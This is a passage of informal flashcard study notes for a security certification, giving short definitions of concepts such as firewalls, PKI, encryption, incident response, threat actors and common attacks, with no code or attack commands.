dismantling and removing an application instance.

Examples of well-defined rules of engagement during an Exercise (2)

do not touch production systems. only focus on test systems

Witness interviews (for forensics) (3)

document quickly as people may not be around later and memories fade. gather many to add evidence and correlate stories. witnesses don't always recognize information as valuable so seek out witnesses and ask right questions

MOA

document where both sides agree to objectives that's usually not legally enforceable.

Proper input validation security (3)

documenting all input methods. checking and correcting all input. use a fuzzer- device that randomly sends info into the inputs of applications.

static code analyzer concerns (2)

doesn't identify everything. allot of false positives needs sorting

symmetric algorithm disadvantages

doesn't scale well

Somewhere you are disadvantages (2)

doesn't work with IPv6. geolocation not perfect identifier of location

Private CA advantages

don't have to purchase each individual CA from a 3rd party.

Deprovisioning security (3)

don't leave any open holes or close important holes. remove firewall rules for removed app. remove or move data from the removed app to different place

Table top exercise

don't perform an actual exercise. everyone simply discusses what the steps might be.

Integrity measurement (3)

done by testing application against a well-documented secure baseline. should be performed often. Failures require immediate corrections.

preventive examples (3)

door locks. security guard. firewall. (control example)

Example of times to deploy Incident Response Exercises

during scheduled update session done: annually semi annually etc

Downgrade attack example

e.g. 1995 FREAK attack forced weaker public keys

Vulnerable business process example

e.g. 2016 Dridex malware used to steal Swift credentials

New threats/zero day example

e.g. WannaCry 2017, patch available since 2014.

Open door examples found during Active Reconnaissance (2)

e.g. enabled guest account, default passwords, etc.

Shimming example

e.g. get around UAC by pretending to be older version of windows with Compatibility mode aka Application Compatibility Shim Cache

Automated alerting and triggers examples (5)

e.g. send you a text, call, email or/and automatically Open a ticket, reboot a device

Logs and events anomalies example

e.g. try to take advantage of vulnerabilities for plugins that don't even exist on the network.

Block ciphers security (3)

each block is encrypted or decrypted independently. uses symmetric encryption. encryption depends on modes of operation.

CBC (3)

each plaintext block is XORed with the previous ciphertext block, which is then encrypted with the block cipher and key for the next ciphertext. Use IV for first block

Distributed allocation security

easier to add security between all the separated components.

MS-CHAP (and v2) security concerns

easy to brute force DES key to decrypt the NTLM hash.

Uses for containerization

easy to delete company data while retaining personal data when leaving organization.

Mobile Device Payment methods security

enable/disable with MDM to limit liabilities of your organization.

PEAP (2)

encapsulates EAP in a TLS tunnel. Uses certificate on the server.

RSA uses (5)

encrypt, decrypt, digital signatures. Website site encryption, digital rights management

Block ciphers (3)

encrypted fixed length groups. often 64-bit or 128-bit. Pad to bring up to minimum level.

SSH

encrypted terminal communication, replaces telnet

IV uses

encryption ciphers, WEP, older SSL implementations

Stream cipher (4)

encryption that is done one bit or byte at a time. High speed. low hardware complexity. symmetric encryption for less overhead.

ECC uses (5)

encryption, digital signatures, pseudo-random generators, ECDSA, on mobile devices, more

Data-at-rest security (5)

encryption: Full disk, database, file or folder-level apply permissions: ACLs, authorized users can access

SSL/TLS (2)

encrypts all communication in browser. uses public key encryption

EAP-TLS (4)

encrypts authentication to web servers. strong security. Wide adoption across wireless network types. Support from most of industry

SSL/TLS in emails

encrypts mail in browser.

client-side validation

end-user's app makes all checks of data.

integrity

ensures no tempering of data

Test environment (2)

environment where code is put together and seen if it would run in a similar environment that production systems run in. QA tests for bugs here.

Supply chain assessment (4)

evaluate coordination between groups e.g. 3rd parties. identify areas of improvement. optimize IT systems supporting the operation. Document the business process changes to increase efficiency

Default configuration (eg)

every application and network device has a default login and user name that should be changed. e.g. Mirai botnet takes advantage of defaults and is open source

Change Management security (2)

every change has a security component that should be evaluated whether installing security patches or application updates. Change in one location can effect security in other places so whole application flow must be tested.

GPS tagging security concerns (2)

every document may contain this type of info making a user easy to track. especially if posted to social media.

what happened to all the certificates affected by the Heartbleed vulnerability? (2)

every web server certificate was replaced. older certificates were moved to the CRL

Single CA

everyone receives their certs from one authority

Chain of custody (3)

everyone who touches evidence, documents that they did. evidence is labeled and cataloged. sealed to prevent tampering.

Logs to physical controls (2)

everything can be logged from physical locations: entering parking, identification upon building entry, badge access to doors. to correlating with digital access: allowing logging into a console while in a certain room.

Malwarebytes

example of Advanced Malware Tool

An application is accepting zip codes from a certain country. Thus it only allows entries X characters long with a letter in the X column. This is an example of what?

example of proper input validation

Metasploit (2)

exploitation framework. Build your own vulnerability tests or use modules in existing exploit databases.

Health Insurance Portability and Accountability Act (HIPAA)

extensive health care standards for storage, use, and transmission of health care info

Methods to take Screenshots (4)

external capture with digital camera or phone. Internal capture with Print Screen key or third party utility

Honeypot (2)

fake system that usually attracts bad guy's automated machines to record their recon. Can make entire virtual worlds.

MFD security concerns

faxed and scanned images can be saved locally and accessed.

Router ACLs (3)

feature of routers used to allow and deny traffic, configure NAT or for QoS functions. Configured on the ingress or egress of an interface. evaluate on certain criteria: Source IP, Destination IP, TCP port numbers, UDP port numbers, ICMP

Geolocation

feature on a mobile device to find its location within feet using GPS, triangulation of signals, etc.

Remote wipe

feature that allows remote removal of all data from a mobile device from any location

Physical controls examples (3)

fences, locks, mantraps (control example)

PKCS #7 (3)

file format that contains certificates and chain certificates. no private keys. stored in ASCII format

client-side validation security

filters legitimate input from genuine users.

Packet filters (2)

filters traffic based on inbound and outbound rules. usually found on a device or server rather then network appliance.

vulnerability scanner test type? How it tests

finds vulnerabilities from e.g. missed patches. active test but minimally invasive. Gathers as much info about the OS as possible and users go through it after to sort priorities

Something you are examples (3)

fingerprint, iris scan, voice print

What system is usually integrated with HVAC and why?

fire alarm system so HVAC doesn't provide additional oxygen to feed the fire and limit its impact.

what are on-site tools to mitigate DDoS? (2)

firewall or IPS

stateless firewall

firewall that acts as a packet filter inspecting every packet inbound and outbound against an ACL regardless of past history

application-based firewall

firewall that decodes and analyzes every packet to tell what application is going by.

WAF

firewalls between web clients and web servers that deny unexpected or unauthorized input.

network-based firewall

firewalls configured to filter by TCP/UDP port number

Do stateful firewalls keep track of sessions?

firewalls that keep track of active sessions

stateful firewall

firewalls with ACL that has session tables that registers the destination and source IP and ports and keeps track of that session. Everything within that valid flow is allowed.

Misconfigured firewall (2)

firewalls with rules that provide too much access. often difficult to audit since allot of organization have thousands of rules

Custom firmware

firmware installed by jailbreaking/rooting a device to gain access to the OS.

Privacy threshold assessment (3)

first step in the compliance process. identifies business processes that are privacy-sensitive. determines if a privacy impact assessment is required

hard-coded

fix (data or parameters) in a program in such a way that they cannot be altered without modifying the program.

NTPsec

fixed a number of vulnerabilities by cleaning up the code base

AP band selection and bandwidths: 5 GHz

for 20 MHz throughput 36 through 64 (8 non-overlapping total, every 4) available 68 through 96 not available 100 to 165 available (17 non-overlapping total) combine channels for 40, 80 and 160 MHz

How can you ensure there is no tampering of evidence? (2)

for physical evidence, we catalog and seal it. for digital evidence, we use a hash.

MOU

formal agreement between two parties a stage above a gentlemen's agreement but not a signed contract or legally binding.

change management

formal process for managing change to avoid downtime, confusion and mistakes.

Threat actor

formal term for bad guy aka malicious actors

DER

format specifically design for X.509 certificates. binary format, not human-readable

PEM uses

format supported on many different platforms, applications, OS

802.11 management frames (2)

frames that make everything work: find AP, manage QoS, associate/disassociate with AP. invisible to the user.

white box

full disclosure pentest of OS, network and services. Usually jumps straight to exploiting

Brute force attack Offline (2)

gain access to the file containing the hashed passwords. large computational resources needed to calculate passwords and try matching them to stored passwords.

Rooting

gaining access to Android OS

Jailbreaking

gaining access to Apple iOS.

intrusive scan

gather info and test to see if vulnerabilities exist without taking advantage of them.

Protocol analyzer (3) what can it find? (2)

gathers packets and presents them in plain English. Over the air or the network. sometimes built into the device, no additional software needed. Identify unknown traffic. Verify packet filtering and security controls.

collectors

gathers the data from the sensors to one place.

Where random number generation is used (2)

generate keys, salted hashes, etc

Hardware or software tokens

generate pseudo-random authentication codes for MFA.

shared account aka

generic account (aka)

Initial exploitation (2)

getting into the network. usually the most challenging part

Network traffic and logs (2)

good for capturing forensic information especially IPS which are specialized for looking for attacks. Some organizations store Raw network data, exact recording of network communication.

Nation states/APT (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

governments, experts in hacking usually focused on national security always external highest sophistication: attack military organizations, security sites, financial control

Cyber-incident response teams (3)

group that may or may not be part of organizational structure. deployed for events determined by organization. handles security incident response, analysis and reporting.

tuples

grouping of ACL rules

shared account examples (2)

guest account. anonymous login

general purpose guides

guides from people who who gone through the process of creating secure configuration (hardening) for a system.

Hacktivist (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

hacker with a mission/goal: political agenda or social change often external pretty sophisticated: specific hacks, DoS, release private info, web site defacing,etc Limited funding but some crowd source

Something you do examples (2)

handwriting. Typing technique, delays between keystrokes

VM sprawl concerns

hard to deprovision VMs if you do not know which applications they relate to.

loop prevention (2)

hard to troubleshoot but easy to resolve. Spanning Tree Protocol prevents this

Infrastructure as a Service aka

hardware as a service (HaaS aka)

Key stretching example

hash a password, hash the hash of that password, continue

Digital signature process (5)

hashes plaintext. encrypts hash with private key. sends encrypted hash with plaintext. receiver will decrypt hash with public key. compare that hash to a hash of received plaintext.

Key generation policies (2)

have a formal process for when some one is given access to an area or a key. 3rd party or management usually signs off on this.

Change management for risk management (5)

have clear policies for change: know when it occurs. duration of occurrence, installation processes, fallback procedures

deprecated algorithms

have design flaws, vulnerabilities

Role-based awareness training security (2)

have detailed documentation and records in case problems occur. apply it for third-parties as well

Posture assessment (6 eg, 1)

health check for BYOD devices, checks for: Malware on device, updated anti-malware, unauthorized applications, corporate applications, mobile device, disk encrypted, available for all OS

Special purpose embedded devices: Medical devices examples (2)

heart monitors. insulin pumps

Example of a connection NFC can bootstrap

helps the pairing process for Bluetooth between a mobile device and an accessory

high availability vs redundancy

high availability means always available but redundant systems may need to be powered on.

weak algorithms

how easy it is to brute force these

ARO

how often a threat might occur in a single year.

SMS/MMS

how we send text messages, video, audio, pictures on phones

commercial CA (3)

hundreds that can be used to digitally sign certificates. built-in to the browser. can be used to purchase web site certificates.

Type I hypervisor

hypervisor that runs as its own OS run directly from hardware.

examples of where RTOS is used (3)

industrial equipment. anti-lock brakes on automobiles. military environments

Security Automation

inexpensive implementation of constant security tests that can be set to run automatically starting early on in the development process.

Dumpster diving (2)

info may be thrown out during certain timings. Bad guys may learn these timing to gather info. legal in the US unless local restriction or private property.

Passive Reconnaissance (6)

information gathering phase before pentesting using open sources like: social media. corporate web site may say where offices and data sites are located. online forums, Reddit. social engineering. dumpster diving. Business organization that work with the target

XSS (2)

inject different scripts to websites to have that information be replayed to different users. takes advantage of web application development errors and the trust a user has for a site

Examples of use of third-party libraries and SDKs

input desired values into a 3rd party library which can provide a graphical gauge with a value.

sideloading

installing apps without an app store usually with a jailbroken/rooted device.

Smart card (2)

integrates with devices. may require a PIN

cloud storage in the enterprise security (3)

integrates with enterprise authentication. can be 2 factor authentication (2FA) Strong encryption required.

Self-signed (2)

internal certificates that don't need to be signed by a public CA but by internal CA. install CA certificate/trust chain on all devices

License Compliance Violation (2)

invalid licence can make application stop working, or work part of the time which is an issue with data integrity

Clickjacking

is a technique that tricks users into clicking on a malicious link by adding the link to a transparent layer over what appears to be a legitimate web page.

Data exposure security concerns (2)

is data being displayed on screen to others? is it encrypted across the network and where its stored?

RPO

is the maximum targeted period in which data loss might be acceptable

DLP best practice

it can sit on many locations so can consolidate all DLP logs to see what occurred during say a file transfer

SATCOM security

keep all software on these devices updated to the latest version

Master Image security (2)

keep the image updated with security patches, OS updates, service updates. Requires allot of time to test that changes don't effect applications.

public key encryption (3)

keeps a private key on the server. uses asymmetric encryption to transfer symmetric session keys. Symmetric encryption creates a secure fast connection.

Accounting (4)

keeps track of resources used: login time, data sent and received, logout time

SCADA/ICS security (2)

kept on a private segmented network usually with no internet access. tight controls and security.

Proximity Cards examples

keycard door access, library cards, payment systems

Cryptographic keys

keys added to ciphers to encrypt plaintext.

Ephemeral keys

keys that need to be changed often.

IoT Home automation security concerns (2)

know when we are home or not. gaining access can potentially gain access to whole house.

Software as a service security

know which security is available in the cloud.

KeySniffer

known vulnerability that allows capture and injection of key strokes and mouse movements.

Vulnerable business process (2)

lack of checks and balances. If the business can be taken advantage of, it will be

Examples of devices that use IEEE 802.1X for Certificate-based authentication (4)

laptops, device storage, separate physical device, or mobile device

HVAC (2)

large complex systems in large enterprises requiring experts in thermodynamics, fluid mechanics and heat transfer to implement. Usually managed centrally.

Distributed Denial of Service

launch a botnet army to bring down a service by overloading the bandwidth.

fighting refactoring

layered approach: update signatures, block known malicious URLs, back up often

interoperability agreements

legal agreements with 3rd-parties when outsourcing services and data to ensure security and control meets organisation requirements

NDA

legal contract that must be signed by employees and third parties to prevent the use and dissemination of confidential information.

Mobile device Recording microphone concerns

legal liabilities different in every situation and state.

Examples of carefully controlled conditions to gain access to keys stored for Key escrow (2)

legal proceedings, court orders

Legal hold (4)

legal technique to keep any data associated with a legal proceeding. hold notification tells what and how much data is preserved. ESI stored in separate repository. may include ongoing preservation of new data created.

Background checks concerns

legalities of what can be done vary by country.

MTBF security (2)

lets us plan for failures. gives us an idea of what we might be able to do to prevent failures

SIEM dashboard (2)

lets you collapse event logs into graphics or charts. break out immediately occurring events, etc

Active tap

lets you switch between many connections and provide additional boost of signal to passing traffic.

How a logic bomb is usually installed

likely left by an insider with administrative privilege.

Mobile Device External media security (2)

limit data written to removable drives. or disable function on MDM

OS least functionality

limit the OS to what is need for users or group.

External storage devices security concerns (2)

limited authentication on these devices to view files, concern if lost or stolen. easy to exfiltrate data

Limits to port mirrors (2)

limited based on: what the switch can handle. the amount of bandwidth that can be sent to the analysis tool.

clean desk policy security

limits the exposure of sensitive data to third parties.

Online vs. offline CA advantages

limits the scope of compromised certificates.

Security advantage of Least privilege on accounts

limits the scope of malicious behavior

Patch management tools

list of all OS and security patches installed on the computer.

cross-referenced online vulnerabilities (2)

list of vulnerabilities found National Vulnerability Database: http://nvd.nist.gov/ and Microsoft Security Bulletins: http://www.microsoft.com/technet/security/current.aspx

Dynamic round-robin scheduling (2)

load balancer scheduling that monitors server load and distribute to the servers with the lowest use. If one server more loaded it uses others first

Weighed round-robin scheduling

load balancer scheduling that prioritizes certain servers to receive more load

Affinity scheduling (2)

load balancer scheduling where each user or application instance is stuck to the same server mainly due to many applications requiring communication to the same instance. tracked trough IP address or session IDs

Active/passive load balancing (3)

load balancing where some servers are active and others on standby. Uses a standby if an active fails. takes the active offline until its repaired.

screen lock (2 eg)

lock on mobile devices that requires passwords. e.g. numbers or letters

security against USB on mobile (2)

locked devices don't allow USB connections, enable auto-lock. be aware that phones can connect through USB as storage devices.

CBS (2)

log file of a sfc scan, ( ).log

Anti-virus log

log of how many virus stopped or URLs blocked

Application Whitelisting logs

logged to the Operating system's centralized log.

Non-regulatory example

logging and sharing malicious IP and URLs with others

SIEM (4)

logs the security events of all the devices across the network. provides security alerts from real time info. Has long term storage and log aggregation. data correlation, links diverse data types. forensic analysis- gather details after event.

Fighting Disassociation (3)

long patch cable. perform a packet capture to confirm its happening. mostly been patched

Identification of an incident

look for precursors or incident indicators.

what is the objective for dynamic analysis (3 eg)

looking for out of the ordinary results: application crash. server error. exception to normal operation of the application.

dig

lookup info from DNS servers: canonical names, IP addresses, Domain names from IP addresses. (more advanced then nslookup)

nslookup OS? uses?

lookup info from DNS servers: canonical names, IP addresses, cache timers. Windows and POSIX-based (already builtin to Linux and mac os) Deprecated (use Dig)

Methods of SATCOM (2)

low earth orbit satellite. geostationary satellite

Goal of redundancy and fault tolerance (2)

maintain uptime and availability of organization. ensure hardware, software and systems keep running after failures occur.

Qualitative risk assessment visual example (3 eg, 4 eg)

make a graph of risk factors e.g. Legacy Windows clients, Untrained Staff, No Anti-Virus Software, and categories of risk associated with those e.g. Impact, ARO, Cost of Controls, Overall Risk.

Key stretching

make a key stronger by performing multiple processes

weak algorithms security

make keys so long that is impractical to brute force.

Obfuscate

make something normally understandable very difficult to understand. (Camouflage)

Obfuscation examples (2)

make source code difficult to read without changing its functionality. Steganography

Architecture/design weaknesses (7)

make sure locks on all doors on the network like: Ingress. VPN. Third-party access. Internal controls. Account access. Front door access. Conference room access

credential management (2)

make sure passwords are stored on the server. audit to make sure communication is encrypted.

how can you secure log files on a web server?

make sure they're enabled: can monitor, access and view all files.

Principles of social engineering: Trust

make you feel safe to give info to

Obfuscation

making something more difficult to understand

Adware (2)

malware that displays advertisements to the user, commonly in a web browser. May cause performance issues over the network.

External threats

man-made threats from outside the organisation.

Memory management

management of memory so it is not taken advantage of.

Role examples for Role-based access control

manager, director, team lead, project manager, etc

data custodian (3)

manages the access rights to the data. implements security controls defined by the steward. is sometimes the same person as the data steward

Identification of an incident concerns (2)

many detection sources with different levels of detail and perception. which are legit threats?

Competitors (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

many motives: DoS, espionage, harm reputation, competitive advantage to this (unethical) High level sophistication significant funding Intents: DoS during an event steal customer lists corrupt manufacturing databases take financial info

Proper error handling security concerns (2)

may allow bad guys to find and take advantage of vulnerabilities. default messages can give info on how application was created or the platform its running on.

Where may AUP be documented?

may be documented in an employee's Rules and Behavior

organization log policies (2)

may need formal process to collect and archive log info. may fall under privacy laws

Captive portal security (2)

may require additional authentication factors. can remove access after certain amount of time or on logout.

Adverse action requirement

may require extensive documentation.

In most organisations, Elasticity is integrated with what?

may require orchestration to automate this process e.g. scaling up and down during different times of day.

Hash aka

message digest (aka)

RIPEMD (2)

message digest created to help with Integrated Broadband Communications in Europe. Performs similar to SHA-1

NAT uses (2)

minimizes IPv4 shortages. a security through obscurity.

What secure configurations should be added to OS user accounts? (2)

minimum password lengths and complexity. Limit capabilities to just what they need.

Investing in security is what type of risk response technique?

mitigate (example)

Grey box

mix of black and white box pentest. Some details given to pentesting team. Up to them to gather additional details

hybrid cloud deployment model

mix of public and private cloud

Mobile Device External media

mobile phones can connect to computers acting as mobile storage devices.

DNS poisoning (2)

modifying the DNS server to send users to incorrect sites. can also be done by modifying the client host file.

SLE

monetary loss of a single event.

Strategic Intelligence (2)

more data that is collected and stored, the easier it is to create a strategy for future protection. make policy changes and process changes based on data gathered.

Impact: Life

most import goal is to make sure everyone is safe.

WPA2 history (3)

most modern encryption for wireless network introduced in 2004. AES replaced RC4. CCMP replaced TKIP.

Personnel issues: Social media security

most organisation have a policy to prevent this often a centralized function around a marketing team

Geolocation security (2)

most phones can disable this function. MDM can require it enabled to track all company assets.

password history (2)

most systems should be set to remember previous passwords used. best to keep passwords unique.

Detective examples (2)

motion detector. IDS/IPS (control example)

random number generation input examples (3)

mouse movements, atmosperic noise, lava lamp

SoC

multiple components and most of the processing running on a single chip with some supporting devices like interfaces surrounding the chip.

Failover security

must be documented in both directions, including the revert back to primary location.

SSID (2 eg) and security (2)

name of the wireless network broadcast by the AP: Netgear, default best to change defaults so they don't describe manufacturer. some disable SSID broadcasting but this is not a security feature since this can be determine by a packet capture.

IoT Home automation

nearly all devices can be connected to wifi at home.

Key escrow security (3)

need clear process and procedures for managing keys. need to be able to trust your 3rd-party and their security. May have carefully controlled conditions to gain access to keys.

SLA examples (2)

network access from a 3rd party may require: a certain uptime. a response time and management of any problems.

Nmap (4)

network mapper- learn more about the network devices across network. port scan: find devices and identify open ports. OS scan: finds what OS is on a device without logging into the device. service scan:name, version, details. (Nmap scripting engine (NSE): extend capabilities, vulnerability scans)

SCADA/ICS (2)

network that centrally controls large pieces of equipment in real time. often used in manufacturing or power distribution.

DMZ

network zone where public has access to public resources but not the internal network

Memory management security concerns (3)

never trust data input. buffer overflows. some built-in function in a programming language are insecure

ABAC is often referred to

next generation of authorization

Dissolvable agents (3)

no installation required. runs during the posture assessment e.g. authentication process. Terminates and removed from device when no longer required

3DES uses

no longer used. replaced by AES.

Immutable system security (2)

no minor updates over time prevent new security issues. can redeploy full previous iterations.

Self-signed advantages (2)

no need to purchase trust for devices that already trust you. provides trust within an organization.

Single point of failure security and concerns

no practical way to remove them all. Invest in the right systems in the right place in the organisation to keep it running as much as possible.

Non-regulatory (3)

no rule or law for compliance, just best practices. law may be in the works. may create value for yourself or others

Password complexity (4)

no single words. no obvious passwords. (dog's name) mix upper and lower case. use special characters but don't replace o with 0 or t with 7.

Qualitative loss (1,eg)

non-monetary business impact e.g. lost laptop can mean lost time for employee to work and provide services to customers.

Qualitative risk assessment (3)

non-monetary business impact. ask opinions about the significance. Display visually with traffic light grid, scale of one to ten, etc.

LDAPS

nonstandard implementation of LDAP over SSL

security issues with 3rd-party apps (2)

not all apps secure: vulnerabilities, data leakage

Air gaps security concerns

not disabling removal media can have some one walk the data between networks.

Something you are disadvantages

not foolproof

biometrics security (2)

not the most secure authentication factor. MDM can enable/disable this function

Resource exhaustion (2)

occurs when the resources required to execute an action are entirely expended, preventing that action from occurring. The most common outcome is DoS.

SSL Accelerators

offloads the SSL handshake off of web servers.

SSL Accelerator (2)

offloads the SSL handshake process, which uses asymmetric encryption, from the web servers to this hardware. Encryption may end here and continue to the web servers using in the clear HTTP

Stream cipher security

often combined with IV since we often send duplicates of info.

Special purpose embedded devices: Medical devices security concerns

often use older OS

NTLM

old Windows authentication method using a domain name, user name and password hash

places to keep a public key

on a public key server available to everyone usually retrieved with an email address.

places HOTP used

on hardware or software tokens

omnidirectional antenna (2)

one of the most common antenna types that distributes signal evenly on all sides. No ability to focus the signal

MDM (3)

one pane of glass to remotely manage all mobile devices. Sets policies, create partitions, force screen locks and PINs

Split knowledge example

one person has half of a safe combination and some one else has the other

Application Whitelisting: Path

only allows application in certain folders to run

Application Whitelisting: Network zone

only allows applications to run from a particular zone or IP address scheme for a network.

Application Whitelisting: Certificate (eg)

only allows digitally signed application from certain publishers. e.g. only allow applications developed by Microsoft by only allowing a particular signed certificate.

Application Whitelisting: Application hash

only applications that match a hash can execute

Email certificates advantages

only receiver can decrypt contents of email with their private keys. digitally signing provides non-repudiation and integrity for emails.

OpenPGP (3)

open standard. RFC 4880. Implemented as software called GPG

shiboleth

open-source software that implements SAML to provide federated SSO.

Mirai botnet (3)

open-source software that takes advantage of default configurations. takes over IoT devices. 60+ default configs

Private cloud deployment model

organization creates and hosts private clouds with local data center available internally.

data retention (2)

organization decide how much data is kept around for how long and how often its kept. may have legal requirements like storing certain data and how its stored (e.g. encrypted)

COPE security (3)

organization keeps full control of the device. usually managed from MDM. Information is protected by policies and can be deleted at any time

Password expiration

organizations can require passwords to be changed every 90, 60, 30 or in critical systems 15 days.

security concerns with the original 802.11 management frames

original frames unprotected with no encryption, authentication or validation and thus vulnerable to disassociation attacks

RIPEMD issues

original had collisions discovered in 2004.

SMS/MMS security concerns (2 + eg)

outbound data leaks, financial disclosures, inbound notifications, phishing attempts

Firmware OTA updates (2)

over the air updates for mobile device OS. can be simple security patches or entire OS updates.

Open proxy security concern

owner of these proxies can add malicious code to responses.

Linux iptables

packet filter in the kernel.

ISM band

part of the 2.4 GHz range reserved for Industrial, scientific, and medical.

what standard is USB OTG?

part of the USB 2.0 standard

Federation authentication process (3)

password and account info is not shared: authentication process is passed to third-party. third-party validates authentication and provides the clearance back to the original site.

Reason password management is challenging on shared accounts (2)

password changes must be informed to every one who shares that password. constant password changes can leave yellow sticky note paper trails

credential management concerns (2)

passwords must not be embedded in the application or stored on the client. Authentication traffic should not be seen.

TOTP (2)

passwords on tokens created with a secret key and a time stamp made by NTP. Timestamp increments every 30 seconds.

HOTP (2)

passwords on tokens used once for a session or authentication attempt and never again. created with a secret key and an incremental counter

NFC implementations (3)

payment systems. Bootstrap for other wireless. Identity system

places to keep a private key

personal key should be kept private.

Spear phishing

phishing customized for targeting specific groups or individuals.

example of software tokens

phone can have software based tokens or just SMS message for additional authentication.

places Fingerprint scanner is used

phones, laptops, door access

Hardware root of trust

physical hardware designed to be difficult to circumvent since code can't change it and security functions do not work without it.

Air gaps

physically separate network with no way to have devices communicate with each other.

antenna placement

place so signal covers all points with different non-overlapping frequencies side by side.

Containerization

placing all company data in a virtual contained area separate and inaccessible from personal data.

other places for firewalls

placing between users and data in data center.

change management process (6)

plan for a change. estimate the risk associated with the change. have recovery plan ready. test before making change. document, get approval and schedule. make change.

Single point of failure

points like outages or downtime to a particular service

PKI (4)

policies, procedures, hardware, software, and people used to manage digital certificates. encapsulates the process of creating, distributing, managing, storing and revoking certificates. Also refers to the binding of public keys to people or devices. Its based on trust created by a CA.

clean desk policy (3 ie)

policy that when you leave your desk, nothing is on top of your desk i.e. paperwork, turned on computer, any seen data.

Captive portal (2)

pop up on a browser asking for username and password for network access. Access table that recognizes a lack of authentication redirects user to this page.

port mirrors aka (2)

port redirection. SPAN (Switched Port ANalyzer)

Background checks aka

pre-employment screening

Background checks (3)

pre-employment screening that allows to: verify applicant's claims. discover criminal history. discover workers compensation claims, shows injuries and illness that worker filed that effect job.

MTBF

predicted time between two failures

Hash (2)

present data as a short string of text. impossible to recover the original message, i.e. one-way trip

Impersonation (4)

pretend to be someone else. can be in person or over the phone. Gather information to become familiar with the organization. can try using higher rank, becoming familiar, throw technical details around

Shimming

pretending to be software-based middleman to get around security.

Pinning security (2)

prevents MITM. if certificates don't match, application can shutdown or show an error message.

How does DLP manage content for mobile devices? (3)

prevents copy/paste of sensitive data. ensures data is encrypted. can set policies from a MDM

DLP (3 eg)

prevents loss of sensitive data: social, credit card #, medical records, etc

Advantage of Nonce

prevents replays during logins since a new number would be used each time.

DAP

previous version of LDAP that ran on the OSI protocol stack.

Screen filters aka

privacy filters (aka)

Intranet

private company network used by employees with internal or VPN access.

Improperly configured accounts (2)

process issue where accounts may be: abandoned and unnecessary, no longer needed. given unneeded administrative access. best practice should prevent admin login accounts unless on a server console.

Asset management (5)

process, usually automated to Identify and track computing assets. allows faster response to security problems. keep an eye on the most valuable assets: both hardware and data. Track licenses and make sure they are updated. keep all devices up to date (patches, antimalware signatures)

Organized crime threat actors (Internal/external, Level of sophistication, Resources/funding, Intent/motivation)

professionals motivated by money almost always external very sophisticated: best hacking money can buy organized: one hacks, one manages exploits, sells data, customer support, etc

honeypot options

projecthoneypot.org/, honeyd

certificate of destruction

proof by a 3rd party that they destroyed your media and data.

Fighting Race conditions

proper checks and validation must be performed

Physical safe security (2)

protect against elements: fire, water. have contingency for lost keys/combinations

Protected distribution (4)

protected fiber and copper with conduits often made of sealed metal. Prevents copper and fiber taps. prevents cutting wires. Periodic visual inspection.

server-side validation security

protects against malicious activity done away from user interfaces.

Backup utilities protects against (4 eg)

protects from downtime, malware, ransomware, server defacement, etc.

Why is Host-based firewalls required for laptops and mobile devices?

protects on unfamiliar and open networks.

LDAP

protocol for reading and writing directories over an IP network.

LDAP (ie)

protocol for reading and writing directories over an IP network. i.e. it organizes large numbers of services into structured databases.

OpenID (and what it combines with)

protocol that provides SSO authentication. Usually combines with OAuth for authorization between applications

OAuth

protocol that provides resource authorization

External storage devices security

provide encryption in case loss or stolen

Importance of physical signs

provides clear and specific instructions e.g. for visitors.

netstat OS?

provides different views for what the statistics are for network communications on a particular device, available for many OS

GCM advantages (3)

provides encryption and authentication at the same time. minimum latency. minimum operation overhead

Provisioning

providing or making something available usually involves adding many other things to make something fully operational

Application proxy (3)

proxies that understand how applications operate. they proxy whole applications on user's behalf. Might understand one application like HTTP or many applications

Public key certificate

public key combined with a digital signature for added trust.

when was MD5 published?

published 1992

Year Diffie-Hellman was published

published in 1976

RSA publication history (3)

published in 1977. first practical use of public key cryptography. Now released into the public domain

Network Infrastructure Devices OS

purpose built embedded OS with limited, non-detailed user access.

Secure cabinets/enclosures (2)

put racks side by side and locked. provide ventilation.

EMI/EMP security (1) and where its found (3)

put shielding in place. military installations. places that deal with national security. highly secure networks

Fighting Privilege Escalation (4)

quickly patch and update software. Update anti-virus/anti-malware since they can stop some known vulnerabilities even if system isn't patched. DEP will not allow vulnerabilities in non-executable areas to run. ASLR would prevent bad guys from focusing on specific memory addresses

DAP

ran on the OSI protocol stack. (was replaced by a more lightweight LDAP that uses TCP/IP)

Built-in Features on a TPM (6)

random number generator. key generator. persistent memory with unique burned-in keys. versatile memory for storing keys and hardware configurations. password protected. Protected against Dictionary Attacks

Nonce number examples (3)

random or pseudo-random number. can be a counter

clear text

readable data transmitted or stored "in the clear" (unencrypted)

low-severity vulnerability

real vulnerability identified but most often not a high priority.

Normalization

refers to organizing the tables and columns to reduce redundant data and improve overall database performance.

Gramm-Leach-Bliley Act (GLBA)

regulation of disclosure of privacy info from financial institutions. i.e. requires financial institutions to provide consumers with a privacy notice explaining what information they collect and how that information is used.

NT LAN Manager v2 (NTLM) challenge/response (3)

relatively insecure MD4 password hash. HMAC-MD5 hash of username and server name. Variable-length challenge that uses timestamp, random data, and Windows domain name

NFC security concerns (5)

remote capture within 10 meters. Frequency jamming. relay/replay attack, MITM. loss of device can be used

purging

remove data partly or completely from a device

dead code security

remove dead code to reduce opportunities for security problems.

Eradication (3)

remove malware. disable breached user accounts. fix vulnerabilities (or is this recovery?)

Advantages of Secure token

removes overhead from servers. easier to scale then server-based authentication.

Fighting adware

removing adware may be challenged by the adware itself as it displays adds for fake removal software that may add more adware.

MD5

replaced MD4. 128-bit hash value

Wireless Replay attack

replays packets captured over the air.

802.1X (2) prevents what?

require authentication for every one who wants to use resource on network. NAC. Helps prevent rogue access points

Capturing IV (4)

required to crack a WEP password. requires thousands. could take all day capturing it over the air or can be collected by replaying a ton of ARPs. Capturing takes time. crack is fast.

Mandatory vacations

requirement to go on vacation a certain number of times or amount of time during the year

Full tunnel

requires all traffic run to a VPN concentrator before it can access 3rd party websites

Off-site backups security (2)

requires extensive protection, usually by compliance.

Perfect forward secrecy concerns

requires more computing power. legacy systems and browsers can't communicate over encrypted channel to servers that support this.

Rooting/Jailbreaking process

requires replacing the OS of the device with their own custom firmware that has OS access.

Requirements for Federation

requires trust between organizations.

Advanced Malware Tools best practice (2)

research best anti-malware and recovery tools possible. better to stop and prevent infection

Cryptanalysis real world use

researchers are constantly trying to find weaknesses in ciphers.

In-band response

response from Inline IPS to drop immediately any malicious identified traffic

Privacy officer (2)

responsible for all the organization's data privacy. sets policies, implements processes and procedures

Recovery (3)

